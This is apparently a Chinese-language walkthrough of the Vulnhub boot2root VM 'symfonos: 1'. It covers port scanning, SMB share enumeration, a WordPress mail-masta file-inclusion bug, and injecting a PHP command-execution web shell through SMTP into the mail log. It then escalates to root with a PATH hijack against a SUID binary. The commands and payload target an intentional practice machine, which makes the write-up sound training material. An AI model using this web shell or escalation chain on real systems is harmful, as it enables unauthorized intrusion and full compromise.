目录
Name
- Name: symfonos: 1
- Date release: 29 Jun 2019
- Author: Zayotic
- Series: symfonos
- Web page: https://blog.zay.li/symfonos-1-boot2root-ctf/
Download
- symfonos1.7z (Size: 739 MB)
- Download: https://drive.google.com/uc?id=1cb7qvWhdg8oyAQw43fm1ZMLjx2Jr3Ga-&export=download
- Download (Mirror): https://download.vulnhub.com/symfonos/symfonos1.7z
- Download (Torrent): https://download.vulnhub.com/symfonos/symfonos1.7z.torrent ( Magnet)
信息收集
root@kali:~# nmap 192.168.243.158 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-26 06:27 EST
Nmap scan report for 192.168.243.158
Host is up (0.00052s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B7:E0:15 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2020-12-26T05:27:58-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-26 06:27:59
|_ start_date: N/ATRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.243.158
访问80端口
访问80端口
查看robots.txt 无果
目录遍历
root@kali:~# dirb http://192.168.243.158/
---- Entering directory: http://192.168.243.158/manual/ ----
==> DIRECTORY: http://192.168.243.158/manual/da/
==> DIRECTORY: http://192.168.243.158/manual/de/
==> DIRECTORY: http://192.168.243.158/manual/en/
==> DIRECTORY: http://192.168.243.158/manual/es/
==> DIRECTORY: http://192.168.243.158/manual/fr/
==> DIRECTORY: http://192.168.243.158/manual/images/
+ http://192.168.243.158/manual/index.html (CODE:200|SIZE:626)
==> DIRECTORY: http://192.168.243.158/manual/ja/
==> DIRECTORY: http://192.168.243.158/manual/ko/
==> DIRECTORY: http://192.168.243.158/manual/style/
==> DIRECTORY: http://192.168.243.158/manual/tr/
==> DIRECTORY: http://192.168.243.158/manual/zh-cn/
发现139、445的smb
root@kali:~# enum4linux 192.168.243.158
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
发现用户为:helios anonymous
root@kali:~# smbclient //192.168.243.158/anonymous
下载文件 smb: \> get attention.txt
root@kali:~# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
root@kali:~# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@kali:~# cat todo.txt1. Binge watch Dexter
2. Dance
3. Work on /h3l105
Work on /h3l105 路径信息
http://symfonos.local/h3l105/index.php/2019/06/29/hello-world/
插件wordpress 漏洞进行文件包含
root@kali:~# wpscan -u http://symfonos.local/h3l105/
mail-masta
root@kali:~# searchsploit mail masta
文件包含
mali文件查看
写入木马文件25端口
root@kali:~# telnet 192.168.243.158 25
Trying 192.168.243.158...
Connected to 192.168.243.158.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
ls
502 5.5.2 Error: command not recognized
dir
502 5.5.2 Error: command not recognized
mail from:ceshi
250 2.1.0 Ok
rcpt to:[email protected]
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']);?>.
250 2.0.0 Ok: queued as 4859A408A1
quit
221 2.0.0 Bye
Connection closed by foreign host.
From [email protected] Sat Dec 26 06:46:05 2020 Return-Path: X-Original-To: [email protected] Delivered-To: [email protected] Received: from unknown (unknown [192.168.243.133]) by symfonos.localdomain (Postfix) with SMTP id 4859A408A1 for ; Sat, 26 Dec 2020 06:43:39 -0600 (CST)
nc 反弹拿shell
交互python
python -c "import pty;pty.spawn('/bin/bash')"
查看执行权限文件
<inc/campaign$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
PATH变量提权
/opt$ strings statuscheck
proof.txt
helios@symfonos:/opt$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh">curl
echo "/bin/sh">curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp/:$PATH
export PATH=/tmp/:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root
# cat proof.txt
cat proof.txt
cat: proof.txt: No such file or directory
# cat /root/proof.txt
cat /root/proof.txt
Congrats on rooting symfonos:1!
=/[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\